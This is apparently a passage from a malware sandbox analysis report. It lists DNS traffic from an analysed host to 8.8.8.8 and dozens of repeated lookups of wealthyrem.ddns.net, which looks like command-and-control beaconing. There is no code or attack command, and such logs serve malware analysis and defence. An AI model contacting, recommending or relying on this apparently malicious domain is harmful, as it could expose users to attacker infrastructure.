Aug 3, 2021 19:05:05.473995924 CEST	51689	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:05.506740093 CEST	53	51689	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:07.687529087 CEST	64806	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:07.727588892 CEST	53	64806	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:10.196857929 CEST	49686	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:10.224415064 CEST	53	49686	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:12.714188099 CEST	56195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:12.749973059 CEST	53	56195	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:14.921039104 CEST	62241	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:14.958893061 CEST	53	62241	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:17.109873056 CEST	50543	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:17.145004988 CEST	53	50543	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:19.332648039 CEST	56445	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:19.365232944 CEST	53	56445	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:21.520255089 CEST	56709	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:21.552804947 CEST	53	56709	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:23.720985889 CEST	51248	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:23.757006884 CEST	53	51248	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:25.923397064 CEST	49679	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:25.959387064 CEST	53	49679	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:28.157883883 CEST	50263	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:28.191822052 CEST	53	50263	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:30.346065044 CEST	49215	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:30.381278038 CEST	53	49215	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:32.537942886 CEST	64372	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:32.573491096 CEST	53	64372	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:34.719111919 CEST	50016	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:34.744133949 CEST	53	50016	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:36.924958944 CEST	61325	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:36.961061954 CEST	53	61325	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:39.130440950 CEST	49160	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:39.165993929 CEST	53	49160	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:41.315402031 CEST	51265	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:41.342091084 CEST	53	51265	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:43.540107012 CEST	52006	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:43.572525024 CEST	53	52006	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:45.754501104 CEST	58697	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:45.787534952 CEST	53	58697	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:47.940515041 CEST	51530	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:47.976157904 CEST	53	51530	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:50.126950026 CEST	50989	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:50.160826921 CEST	53	50989	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:52.331804991 CEST	53323	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:52.357184887 CEST	53	53323	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:54.534140110 CEST	59034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:54.568398952 CEST	53	59034	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:56.720890045 CEST	53106	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:56.756485939 CEST	53	53106	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:58.957617998 CEST	62132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:58.990415096 CEST	53	62132	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:01.144287109 CEST	54489	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:01.181267023 CEST	53	54489	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:03.333826065 CEST	64390	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:03.364897013 CEST	53	64390	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:05.550487041 CEST	58369	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:05.585144997 CEST	53	58369	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:07.741825104 CEST	64203	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:07.775700092 CEST	53	64203	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:09.941957951 CEST	49232	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:09.969455957 CEST	53	49232	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:12.149107933 CEST	52558	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:12.181878090 CEST	53	52558	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:15.198581934 CEST	53555	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:15.233902931 CEST	53	53555	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:17.397550106 CEST	50083	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:17.436507940 CEST	53	50083	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:19.587477922 CEST	49804	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:19.619803905 CEST	53	49804	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:21.772907972 CEST	62963	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:21.808489084 CEST	53	62963	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:23.959944010 CEST	63695	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:23.992546082 CEST	53	63695	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:26.166287899 CEST	64296	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:26.202452898 CEST	53	64296	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:28.366338015 CEST	60844	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:28.401519060 CEST	53	60844	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:30.600789070 CEST	63917	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:30.626837969 CEST	53	63917	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:32.799395084 CEST	51851	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:32.831609011 CEST	53	51851	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:34.995313883 CEST	49898	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:35.025839090 CEST	53	49898	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:37.197623014 CEST	49632	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:37.231322050 CEST	53	49632	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:39.385412931 CEST	65361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:39.421473026 CEST	53	65361	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:41.637833118 CEST	50206	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:41.665680885 CEST	53	50206	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:43.841898918 CEST	49613	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:43.874284983 CEST	53	49613	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:46.065788031 CEST	63032	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:46.092864037 CEST	53	63032	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:48.259576082 CEST	54898	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:48.294316053 CEST	53	54898	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:50.478462934 CEST	61710	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:50.514136076 CEST	53	61710	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:52.664053917 CEST	52073	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:52.690589905 CEST	53	52073	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:54.146475077 CEST	63949	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:54.193475962 CEST	53	63949	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:54.869762897 CEST	57561	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:54.903347015 CEST	53	57561	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:57.063138962 CEST	53205	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:57.096909046 CEST	53	53205	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:59.274760008 CEST	60579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:59.308945894 CEST	53	60579	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:01.536617041 CEST	49765	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:01.572048903 CEST	53	49765	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:03.743144989 CEST	57650	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:03.779144049 CEST	53	57650	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:05.939706087 CEST	65317	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:05.974879980 CEST	53	65317	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:08.149225950 CEST	64654	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:08.178571939 CEST	53	64654	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:10.377194881 CEST	51191	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:10.413378954 CEST	53	51191	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:12.588496923 CEST	63870	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:12.616333008 CEST	53	63870	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:14.790198088 CEST	57013	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:14.823110104 CEST	53	57013	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:17.232678890 CEST	58745	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:17.267951012 CEST	53	58745	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:19.495464087 CEST	64272	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:19.534274101 CEST	53	64272	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:21.703489065 CEST	56440	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:21.735933065 CEST	53	56440	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:23.890366077 CEST	59492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:23.916037083 CEST	53	59492	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:26.093004942 CEST	62125	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:26.126003981 CEST	53	62125	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:28.307390928 CEST	61776	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:28.345453024 CEST	53	61776	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:28.732209921 CEST	53928	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:28.773401976 CEST	53	53928	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:30.528975964 CEST	51058	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:30.567393064 CEST	53	51058	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:32.768989086 CEST	56711	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:32.802838087 CEST	53	56711	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:35.004992008 CEST	54780	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:35.040189981 CEST	53	54780	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:37.205674887 CEST	54305	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:37.239572048 CEST	53	54305	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:39.391149044 CEST	61669	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:39.415898085 CEST	53	61669	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:41.593108892 CEST	57336	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:41.625711918 CEST	53	57336	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:43.791191101 CEST	64577	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:43.823787928 CEST	53	64577	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:45.981834888 CEST	64987	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:46.009243011 CEST	53	64987	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:48.208339930 CEST	58655	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:48.245440960 CEST	53	58655	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:50.405112028 CEST	60905	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:50.439282894 CEST	53	60905	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:52.700977087 CEST	62776	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:52.736202002 CEST	53	62776	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:54.903065920 CEST	56923	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:54.935384989 CEST	53	56923	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:57.106620073 CEST	65201	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:57.142123938 CEST	53	65201	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:59.292171955 CEST	54264	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:59.324852943 CEST	53	54264	8.8.8.8	192.168.2.3
Aug 3, 2021 19:08:01.496685028 CEST	58439	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:08:01.529334068 CEST	53	58439	8.8.8.8	192.168.2.3
Aug 3, 2021 19:08:03.698606014 CEST	54235	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:08:03.731192112 CEST	53	54235	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 19:01:32.114979982 CEST	192.168.2.3	8.8.8.8	0x4f55	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:34.315417051 CEST	192.168.2.3	8.8.8.8	0xc0f9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:36.516494036 CEST	192.168.2.3	8.8.8.8	0xb853	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:38.721241951 CEST	192.168.2.3	8.8.8.8	0x4c0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:40.908818960 CEST	192.168.2.3	8.8.8.8	0x8464	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:43.099242926 CEST	192.168.2.3	8.8.8.8	0x1298	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:45.284416914 CEST	192.168.2.3	8.8.8.8	0x2508	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:47.753312111 CEST	192.168.2.3	8.8.8.8	0x95dd	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:50.319245100 CEST	192.168.2.3	8.8.8.8	0x91d3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:52.518642902 CEST	192.168.2.3	8.8.8.8	0x3f8e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:54.722306013 CEST	192.168.2.3	8.8.8.8	0x64f4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:56.924621105 CEST	192.168.2.3	8.8.8.8	0x58e4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:01:59.130711079 CEST	192.168.2.3	8.8.8.8	0xae14	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:01.320058107 CEST	192.168.2.3	8.8.8.8	0x9d7b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:03.553585052 CEST	192.168.2.3	8.8.8.8	0xf106	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:07.920561075 CEST	192.168.2.3	8.8.8.8	0xcfbc	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:10.120966911 CEST	192.168.2.3	8.8.8.8	0xb28d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:12.344211102 CEST	192.168.2.3	8.8.8.8	0xf8d3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:14.686839104 CEST	192.168.2.3	8.8.8.8	0xabd4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:16.953767061 CEST	192.168.2.3	8.8.8.8	0x296	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:19.211441040 CEST	192.168.2.3	8.8.8.8	0x4268	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:21.429611921 CEST	192.168.2.3	8.8.8.8	0xb8c4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:23.626596928 CEST	192.168.2.3	8.8.8.8	0xd8c3	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:25.812108994 CEST	192.168.2.3	8.8.8.8	0xe46d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:28.016876936 CEST	192.168.2.3	8.8.8.8	0xe1a4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:30.218873978 CEST	192.168.2.3	8.8.8.8	0x95e9	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:32.420996904 CEST	192.168.2.3	8.8.8.8	0xef1	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:34.679191113 CEST	192.168.2.3	8.8.8.8	0xb849	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:36.880808115 CEST	192.168.2.3	8.8.8.8	0x4e81	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:39.080692053 CEST	192.168.2.3	8.8.8.8	0xd3b6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:41.443295956 CEST	192.168.2.3	8.8.8.8	0x6608	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:43.643707991 CEST	192.168.2.3	8.8.8.8	0x7d7e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:45.850692987 CEST	192.168.2.3	8.8.8.8	0x8d99	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:48.038158894 CEST	192.168.2.3	8.8.8.8	0xbc7c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:50.265275955 CEST	192.168.2.3	8.8.8.8	0xf886	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:52.473217964 CEST	192.168.2.3	8.8.8.8	0xff	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:54.709424973 CEST	192.168.2.3	8.8.8.8	0x7c6b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:02:57.038458109 CEST	192.168.2.3	8.8.8.8	0xd11b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:00.213896036 CEST	192.168.2.3	8.8.8.8	0x8a1b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:02.430080891 CEST	192.168.2.3	8.8.8.8	0xa63	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:04.613842010 CEST	192.168.2.3	8.8.8.8	0x48fd	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:06.893040895 CEST	192.168.2.3	8.8.8.8	0x9167	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:09.084055901 CEST	192.168.2.3	8.8.8.8	0x62ed	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:11.271615028 CEST	192.168.2.3	8.8.8.8	0xf165	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:13.477817059 CEST	192.168.2.3	8.8.8.8	0x3d90	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:15.679207087 CEST	192.168.2.3	8.8.8.8	0xf3a8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:17.865520954 CEST	192.168.2.3	8.8.8.8	0x1e50	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:20.084985018 CEST	192.168.2.3	8.8.8.8	0xea4b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:22.322797060 CEST	192.168.2.3	8.8.8.8	0x9268	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:24.522763014 CEST	192.168.2.3	8.8.8.8	0x2dba	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:26.742661953 CEST	192.168.2.3	8.8.8.8	0xe4f0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:28.930773973 CEST	192.168.2.3	8.8.8.8	0xf843	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:31.135622978 CEST	192.168.2.3	8.8.8.8	0x7112	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:33.318119049 CEST	192.168.2.3	8.8.8.8	0x5739	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:35.511454105 CEST	192.168.2.3	8.8.8.8	0x752	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:37.775151014 CEST	192.168.2.3	8.8.8.8	0xa606	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:39.970947981 CEST	192.168.2.3	8.8.8.8	0x5794	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:42.164659977 CEST	192.168.2.3	8.8.8.8	0xc21d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:44.354120970 CEST	192.168.2.3	8.8.8.8	0x50ae	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:46.570506096 CEST	192.168.2.3	8.8.8.8	0xab70	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:48.773654938 CEST	192.168.2.3	8.8.8.8	0xf7a2	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:50.951783895 CEST	192.168.2.3	8.8.8.8	0xc7d0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:53.197990894 CEST	192.168.2.3	8.8.8.8	0x2ac8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:55.415544033 CEST	192.168.2.3	8.8.8.8	0xdb67	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:57.632731915 CEST	192.168.2.3	8.8.8.8	0x8876	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:03:59.824805975 CEST	192.168.2.3	8.8.8.8	0xdd4a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:02.424027920 CEST	192.168.2.3	8.8.8.8	0x40a4	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:05.025619984 CEST	192.168.2.3	8.8.8.8	0xc20b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:07.243323088 CEST	192.168.2.3	8.8.8.8	0xe42a	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:09.483490944 CEST	192.168.2.3	8.8.8.8	0xba28	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:11.765233040 CEST	192.168.2.3	8.8.8.8	0xddb0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:14.084388971 CEST	192.168.2.3	8.8.8.8	0xfeb0	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:16.275333881 CEST	192.168.2.3	8.8.8.8	0xa694	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:18.478743076 CEST	192.168.2.3	8.8.8.8	0xa8c7	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:20.698674917 CEST	192.168.2.3	8.8.8.8	0x5126	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:22.901813030 CEST	192.168.2.3	8.8.8.8	0xa630	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:25.226316929 CEST	192.168.2.3	8.8.8.8	0xf5b	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:27.418201923 CEST	192.168.2.3	8.8.8.8	0xc235	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:29.614897013 CEST	192.168.2.3	8.8.8.8	0x7a7c	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:31.996125937 CEST	192.168.2.3	8.8.8.8	0xd305	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:34.188719988 CEST	192.168.2.3	8.8.8.8	0x8c28	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:36.419224977 CEST	192.168.2.3	8.8.8.8	0x8a03	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:38.651132107 CEST	192.168.2.3	8.8.8.8	0x6df8	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:40.952564955 CEST	192.168.2.3	8.8.8.8	0x5512	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:43.204242945 CEST	192.168.2.3	8.8.8.8	0x346e	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:45.405143023 CEST	192.168.2.3	8.8.8.8	0xbe48	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:47.623676062 CEST	192.168.2.3	8.8.8.8	0x2dc6	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:49.844846964 CEST	192.168.2.3	8.8.8.8	0x5442	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:52.075742960 CEST	192.168.2.3	8.8.8.8	0x907d	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
Aug 3, 2021 19:04:54.286129951 CEST	192.168.2.3	8.8.8.8	0x3c36	Standard query (0)	wealthyrem.ddns.net	A (IP address)	IN (0x0001)
